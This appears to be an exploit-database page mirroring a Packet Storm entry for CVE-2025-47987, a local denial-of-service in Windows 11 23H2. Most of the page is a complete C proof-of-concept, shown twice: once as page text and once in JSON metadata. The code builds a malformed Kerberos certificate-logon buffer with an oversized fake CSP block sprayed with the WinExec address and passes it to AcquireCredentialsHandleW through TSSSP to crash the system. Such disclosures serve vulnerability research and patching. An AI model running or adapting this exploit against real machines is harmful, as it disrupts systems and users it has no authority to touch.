📄 Microsoft Windows 11 23H2 Denial of Service_PACKETSTORM:220388

7.8 / 10

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

Description

Microsoft Windows 11 23H2 suffers from a denial of service vulnerability...

Visit Original Source

Basic Information

ID PACKETSTORM:220388

Published May 5, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: Windows 11 23H2 - Denial of Service (DoS)
# Google Dork: N/A
# Date: 2025-08-22
# Exploit Author: Kryptoenix
# Vendor Homepage: https://www.microsoft.com/
# Software Link: https://www.microsoft.com/en-us/software-download/windows11
# Version: Windows 11 23H2
# Tested on: Windows 11 23H2 (x64)
# CVE: CVE-2025-47987

#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <credssp.h>
#include <stdint.h>
#include <wchar.h>

#pragma comment(lib, "secur32.lib")

#define ALIGN_TO_8(x) (((x) + 7) & ~((size_t)7))

int BuildKerbCertLogonBuffer(
const WCHAR* username,
const WCHAR* domain,
const WCHAR* password,
const BYTE* certBlob,
DWORD certBlobSize,
BYTE** outBuffer,
DWORD* outBufferSize)
{
if (!username || !domain || !password || !certBlob || !outBuffer || !outBufferSize) return -1;

uint64_t usernameLen = (uint64_t)(wcslen(username) * sizeof(WCHAR));
uint64_t domainLen = (uint64_t)(wcslen(domain) * sizeof(WCHAR));
uint64_t passwordLen = (uint64_t)(wcslen(password) * sizeof(WCHAR));

size_t offsetUser = 0x48; // header is fixed 0x48 bytes
size_t offsetPassword = offsetUser + ALIGN_TO_8(usernameLen);
size_t offsetDomain = offsetPassword + ALIGN_TO_8(passwordLen);
size_t offsetCert = offsetDomain + ALIGN_TO_8(domainLen);

size_t totalSize = offsetCert + ALIGN_TO_8(certBlobSize);

BYTE* buf = (BYTE*)malloc(totalSize);
if (!buf) return -1;
memset(buf, 0, totalSize);

// 0x00: type
*(uint64_t*)(buf + 0x00) = 13ULL;

// username entry
*(uint64_t*)(buf + 0x08) = usernameLen;
*(uint64_t*)(buf + 0x10) = (uint64_t)offsetUser;

// password entry
*(uint64_t*)(buf + 0x18) = passwordLen;
*(uint64_t*)(buf + 0x20) = (uint64_t)offsetPassword;

// domain entry
*(uint64_t*)(buf + 0x28) = domainLen;
*(uint64_t*)(buf + 0x30) = (uint64_t)offsetDomain;

// cert offset/size
*(uint32_t*)(buf + 0x38) = (uint32_t)0x1337; // :)
*(uint32_t*)(buf + 0x3C) = (uint32_t)certBlobSize;
*(uint32_t*)(buf + 0x40) = (uint32_t)offsetCert;

// payload copies
memcpy(buf + offsetUser, username, usernameLen);
memcpy(buf + offsetPassword, password, passwordLen);
memcpy(buf + offsetDomain, domain, domainLen);
memcpy(buf + offsetCert, certBlob, certBlobSize);

printf("\nHeader of packed buffer (first 64 bytes):\n");
for (size_t i = 0; i < (totalSize < 64 ? totalSize : 64); ++i) {
printf("%02x ", buf[i]);
if ((i & 0x7) == 0x7) printf("\n");
}
printf("\n");

*outBuffer = buf;
*outBufferSize = (DWORD)totalSize;
return 0;
}

BYTE* BuildFakeCspData(
const char* str,
size_t strLen,
DWORD providerValue, // stored at header[5]
DWORD* outSize)
{
if (!str) return NULL;

size_t lenChars = strLen + 1;
size_t stringBytes = lenChars;

size_t headerBytes = 44; // 40-byte base + one DWORD offset
size_t totalBytes = headerBytes + stringBytes;
if (totalBytes < 0x30) totalBytes = 0x30;

BYTE* buffer = (BYTE*)malloc(totalBytes);
if (!buffer) return NULL;
memset(buffer, 0, totalBytes);

// header[5] = providerValue
((DWORD*)buffer)[5] = providerValue;

// header[6] = offset for string (in bytes from start of data area)
((DWORD*)buffer)[6] = 0;

// copy the string into the data area
BYTE* stringArea = buffer + headerBytes;
memcpy(stringArea, str, lenChars);

printf("Header of CSP buffer (first 44 bytes):\n");
for (size_t i = 0; i < headerBytes; ++i) {
printf("%02x ", buffer[i]);
if ((i & 0x7) == 0x7) printf("\n");
}
printf("\n\n");

if (outSize)
*outSize = (DWORD)totalBytes;

return buffer;
}

unsigned char* ptrToBytes(void* ptr, size_t* outLen) {
size_t len = sizeof(void*); // 8 bytes
unsigned char* buf = (unsigned char*)malloc(len);
if (!buf) return NULL;
memcpy(buf, &ptr, len); // copy pointer value into buffer
if (outLen) *outLen = len;
return buf;
}

unsigned char* BuildStringPattern(const unsigned char* pattern, size_t patLen, size_t repeatCount) {
size_t totalLen = patLen * repeatCount;
unsigned char* buf = (unsigned char*)malloc(totalLen);
if (!buf) return NULL;

// add padding for pointer allignment
memset(buf, 0, 4);

unsigned char* p = buf + 4;
for (size_t i = 0; i < repeatCount; i++) {
memcpy(p, pattern, patLen);
p += patLen;
}
return buf;
}

wchar_t* BuildWideStringPattern(const wchar_t* pattern, size_t repeatCount) {
if (!pattern || repeatCount == 0) return NULL;

size_t patLen = wcslen(pattern);
size_t totalLen = (patLen * repeatCount) + 1;

wchar_t* buf = (wchar_t*)malloc(totalLen * sizeof(wchar_t));
if (!buf) return NULL;

wchar_t* p = buf;

// copy pattern repeatedly
for (size_t i = 0; i < repeatCount; i++) {
wmemcpy(p, pattern, patLen);
p += patLen;
}

*p = L'\0';

return buf;
}
int main(void)
{
size_t addrLen;
unsigned char* addrBytes = ptrToBytes((void*)WinExec, &addrLen);
if (!addrBytes) {
fprintf(stderr, "Failed to allocate address bytes.\n");
return 1;
}

size_t repeatCount = 0x1FFFFFE0; // 0xFFFFFF00 = 8 * 0x1FFFFFE0
unsigned char* hugeStr = BuildStringPattern(addrBytes, addrLen, repeatCount);
if (!hugeStr) {
fprintf(stderr, "Failed to allocate huge buffer.\n");
free(addrBytes);
return 1;
}

DWORD fakeSize;
printf("Building fake CSP buffer...\n\n");
BYTE* fakeCsp = BuildFakeCspData((const char *)hugeStr, 0xFFFFFF00, 0x18, &fakeSize);

if (!fakeCsp) {
wprintf(L"Allocation failed\n");
return 1;
}

wprintf(L"Built fake CSPDATA size=0x%X\n\n", fakeSize);
//getchar();

SECURITY_STATUS status;
CredHandle credHandle;
TimeStamp expiry;

const WCHAR* username = L"exampleusername";
const WCHAR* domain = L"exampledomain";
const WCHAR* password = L"examplepassexamplepassexamplepassexamplepassexamplepass";

BYTE* buf = NULL;
DWORD bufSize = 0;

printf("Building fake KerbCertLogonBuffer...\n");
if (BuildKerbCertLogonBuffer(username, domain, password, fakeCsp, fakeSize, &buf, &bufSize) != 0) {
printf("Failed to build KerbCertLogonBuffer\n");
return 1;
}

printf("Trigerring the bug...\n");
status = AcquireCredentialsHandleW(
NULL,
(LPWSTR)L"TSSSP", // pszPackage (name of the security package)
SECPKG_CRED_OUTBOUND,
NULL,
buf, // pAuthData (pointer to authentication data)
NULL,
NULL,
&credHandle,
&expiry
);

if (status == SEC_E_OK) {
printf("AcquireCredentialsHandle succeeded\n");
FreeCredentialsHandle(&credHandle);
}
else {

if (status == SEC_E_INSUFFICIENT_MEMORY) {
printf("Not enough memory to trigger the crash :(\n");
printf("[-] PoC failed!\n");
}
else if (status == SEC_E_INTERNAL_ERROR) {
printf("\n[+] PoC succeded! Enjoy the crash >:D\n");
}
else {
printf("AcquireCredentialsHandle failed! Error: 0x%x\n",status);
printf("[-] PoC failed!\n");
}
}

if (buf) free(buf);
if(hugeStr) free(hugeStr);
if(fakeCsp) free(fakeCsp);
return 0;
}

{
    "lastseen": "2026-05-05T22:00:05",
    "description": "Microsoft Windows 11 23H2 suffers from a denial of service vulnerability...",
    "published": "2026-05-05T00:00:00",
    "modified": "2026-05-05T00:00:00",
    "type": "packetstorm",
    "title": "\ud83d\udcc4 Microsoft Windows 11 23H2 Denial of Service",
    "source": "",
    "references": "",
    "id": "PACKETSTORM:220388",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-47987"
    ],
    "sourceData": "# Exploit Title: Windows 11 23H2 - Denial of Service (DoS)\n    # Google Dork: N/A\n    # Date: 2025-08-22\n    # Exploit Author: Kryptoenix\n    # Vendor Homepage: https://www.microsoft.com/\n    # Software Link: https://www.microsoft.com/en-us/software-download/windows11\n    # Version: Windows 11 23H2\n    # Tested on: Windows 11 23H2 (x64)\n    # CVE: CVE-2025-47987\n    \n    \n    \n    #define SECURITY_WIN32\n    #include <windows.h>\n    #include <sspi.h>\n    #include <stdio.h>\n    #include <stdlib.h>\n    #include <string.h>\n    #include <credssp.h>\n    #include <stdint.h>\n    #include <wchar.h>\n    \n    #pragma comment(lib, \"secur32.lib\")\n    \n    \n    #define ALIGN_TO_8(x) (((x) + 7) & ~((size_t)7))\n    \n    \n    int BuildKerbCertLogonBuffer(\n        const WCHAR* username,\n        const WCHAR* domain,\n        const WCHAR* password,\n        const BYTE* certBlob,\n        DWORD certBlobSize,\n        BYTE** outBuffer,\n        DWORD* outBufferSize)\n    {\n        if (!username || !domain || !password || !certBlob || !outBuffer || !outBufferSize) return -1;\n    \n        uint64_t usernameLen = (uint64_t)(wcslen(username) * sizeof(WCHAR));\n        uint64_t domainLen = (uint64_t)(wcslen(domain) * sizeof(WCHAR));\n        uint64_t passwordLen = (uint64_t)(wcslen(password) * sizeof(WCHAR));\n    \n        size_t offsetUser = 0x48; // header is fixed 0x48 bytes\n        size_t offsetPassword = offsetUser + ALIGN_TO_8(usernameLen);\n        size_t offsetDomain = offsetPassword + ALIGN_TO_8(passwordLen);\n        size_t offsetCert = offsetDomain + ALIGN_TO_8(domainLen);\n    \n        size_t totalSize = offsetCert + ALIGN_TO_8(certBlobSize);\n    \n        BYTE* buf = (BYTE*)malloc(totalSize);\n        if (!buf) return -1;\n        memset(buf, 0, totalSize);\n    \n        // 0x00: type\n        *(uint64_t*)(buf + 0x00) = 13ULL;\n    \n        // username entry\n        *(uint64_t*)(buf + 0x08) = usernameLen;\n        *(uint64_t*)(buf + 0x10) = (uint64_t)offsetUser;\n    \n        // password entry\n        *(uint64_t*)(buf + 0x18) = passwordLen;\n        *(uint64_t*)(buf + 0x20) = (uint64_t)offsetPassword;\n    \n        // domain entry\n        *(uint64_t*)(buf + 0x28) = domainLen;\n        *(uint64_t*)(buf + 0x30) = (uint64_t)offsetDomain;\n    \n        // cert offset/size\n        *(uint32_t*)(buf + 0x38) = (uint32_t)0x1337; // :)\n        *(uint32_t*)(buf + 0x3C) = (uint32_t)certBlobSize;\n        *(uint32_t*)(buf + 0x40) = (uint32_t)offsetCert;\n    \n        // payload copies\n        memcpy(buf + offsetUser, username, usernameLen);\n        memcpy(buf + offsetPassword, password, passwordLen);\n        memcpy(buf + offsetDomain, domain, domainLen);\n        memcpy(buf + offsetCert, certBlob, certBlobSize);\n    \n        printf(\"\\nHeader of packed buffer (first 64 bytes):\\n\");\n        for (size_t i = 0; i < (totalSize < 64 ? totalSize : 64); ++i) {\n            printf(\"%02x \", buf[i]);\n            if ((i & 0x7) == 0x7) printf(\"\\n\");\n        }\n        printf(\"\\n\");\n    \n    \n        *outBuffer = buf;\n        *outBufferSize = (DWORD)totalSize;\n        return 0;\n    }\n    \n    BYTE* BuildFakeCspData(\n        const char* str,       \n        size_t strLen,\n        DWORD providerValue,   // stored at header[5]\n        DWORD* outSize)        \n    {\n        if (!str) return NULL;\n    \n        size_t lenChars = strLen + 1; \n        size_t stringBytes = lenChars;     \n    \n        size_t headerBytes = 44; // 40-byte base + one DWORD offset\n        size_t totalBytes = headerBytes + stringBytes;\n        if (totalBytes < 0x30) totalBytes = 0x30;\n    \n        BYTE* buffer = (BYTE*)malloc(totalBytes);\n        if (!buffer) return NULL;\n        memset(buffer, 0, totalBytes);\n    \n        // header[5] = providerValue\n        ((DWORD*)buffer)[5] = providerValue;\n    \n        // header[6] = offset for string (in bytes from start of data area)\n        ((DWORD*)buffer)[6] = 0;\n    \n        // copy the string into the data area\n        BYTE* stringArea = buffer + headerBytes;\n        memcpy(stringArea, str, lenChars); \n    \n        printf(\"Header of CSP buffer (first 44 bytes):\\n\");\n        for (size_t i = 0; i < headerBytes; ++i) {\n            printf(\"%02x \", buffer[i]);\n            if ((i & 0x7) == 0x7) printf(\"\\n\");\n        }\n        printf(\"\\n\\n\");\n    \n    \n        if (outSize)\n            *outSize = (DWORD)totalBytes;\n    \n        return buffer;\n    }\n    \n    \n    unsigned char* ptrToBytes(void* ptr, size_t* outLen) {\n        size_t len = sizeof(void*); // 8 bytes \n        unsigned char* buf = (unsigned char*)malloc(len);\n        if (!buf) return NULL;\n        memcpy(buf, &ptr, len); // copy pointer value into buffer\n        if (outLen) *outLen = len;\n        return buf;\n    }\n    \n    unsigned char* BuildStringPattern(const unsigned char* pattern, size_t patLen, size_t repeatCount) {\n        size_t totalLen = patLen * repeatCount;\n        unsigned char* buf = (unsigned char*)malloc(totalLen);\n        if (!buf) return NULL;\n    \n        // add padding for pointer allignment\n        memset(buf, 0, 4);\n    \n        unsigned char* p = buf + 4;\n        for (size_t i = 0; i < repeatCount; i++) {\n            memcpy(p, pattern, patLen);\n            p += patLen;\n        }\n        return buf;\n    }\n    \n    wchar_t* BuildWideStringPattern(const wchar_t* pattern, size_t repeatCount) {\n        if (!pattern || repeatCount == 0) return NULL;\n    \n        size_t patLen = wcslen(pattern); \n        size_t totalLen = (patLen * repeatCount) + 1; \n    \n        wchar_t* buf = (wchar_t*)malloc(totalLen * sizeof(wchar_t));\n        if (!buf) return NULL;\n    \n        wchar_t* p = buf;\n    \n        // copy pattern repeatedly\n        for (size_t i = 0; i < repeatCount; i++) {\n            wmemcpy(p, pattern, patLen);\n            p += patLen;\n        }\n    \n        *p = L'\\0';\n    \n        return buf;\n    }\n    int main(void)\n    {\n        size_t addrLen;\n        unsigned char* addrBytes = ptrToBytes((void*)WinExec, &addrLen);\n        if (!addrBytes) {\n            fprintf(stderr, \"Failed to allocate address bytes.\\n\");\n            return 1;\n        }\n    \n    \n        size_t repeatCount = 0x1FFFFFE0; // 0xFFFFFF00 = 8 * 0x1FFFFFE0\n        unsigned char* hugeStr = BuildStringPattern(addrBytes, addrLen, repeatCount);\n        if (!hugeStr) {\n            fprintf(stderr, \"Failed to allocate huge buffer.\\n\");\n            free(addrBytes);\n            return 1;\n        }\n    \n        DWORD fakeSize;\n        printf(\"Building fake CSP buffer...\\n\\n\");\n        BYTE* fakeCsp = BuildFakeCspData((const char *)hugeStr, 0xFFFFFF00, 0x18, &fakeSize);\n    \n        if (!fakeCsp) {\n            wprintf(L\"Allocation failed\\n\");\n            return 1;\n        }\n    \n        wprintf(L\"Built fake CSPDATA size=0x%X\\n\\n\", fakeSize);\n        //getchar();\n    \n        SECURITY_STATUS status;\n        CredHandle credHandle;\n        TimeStamp expiry;\n    \n        const WCHAR* username = L\"exampleusername\";\n        const WCHAR* domain = L\"exampledomain\";\n        const WCHAR* password = L\"examplepassexamplepassexamplepassexamplepassexamplepass\";   \n        \n    \n        BYTE* buf = NULL;\n        DWORD bufSize = 0;\n    \n        printf(\"Building fake KerbCertLogonBuffer...\\n\");\n        if (BuildKerbCertLogonBuffer(username, domain, password, fakeCsp, fakeSize, &buf, &bufSize) != 0) {\n            printf(\"Failed to build KerbCertLogonBuffer\\n\");\n            return 1;\n        }\n    \n        printf(\"Trigerring the bug...\\n\");\n        status = AcquireCredentialsHandleW(\n            NULL,\n            (LPWSTR)L\"TSSSP\",       // pszPackage (name of the security package)\n            SECPKG_CRED_OUTBOUND,   \n            NULL,\n            buf,                    // pAuthData (pointer to authentication data)\n            NULL,\n            NULL,\n            &credHandle,\n            &expiry\n        );\n    \n        if (status == SEC_E_OK) {\n            printf(\"AcquireCredentialsHandle succeeded\\n\");\n            FreeCredentialsHandle(&credHandle);\n        }\n        else {\n    \n            if (status == SEC_E_INSUFFICIENT_MEMORY) {\n                printf(\"Not enough memory to trigger the crash :(\\n\");\n                printf(\"[-] PoC failed!\\n\");\n            }\n            else if (status == SEC_E_INTERNAL_ERROR) {\n                printf(\"\\n[+] PoC succeded! Enjoy the crash >:D\\n\");\n            }\n            else {\n                printf(\"AcquireCredentialsHandle failed! Error: 0x%x\\n\",status);\n                printf(\"[-] PoC failed!\\n\");\n            }\n        }\n    \n        if (buf) free(buf);\n        if(hugeStr) free(hugeStr);\n        if(fakeCsp) free(fakeCsp);\n        return 0;\n    }",
    "sourceHref": "https://packetstorm.news/download/220388",
    "cvss": {
        "score": 7.8,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://packetstorm.news/files/id/220388/",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply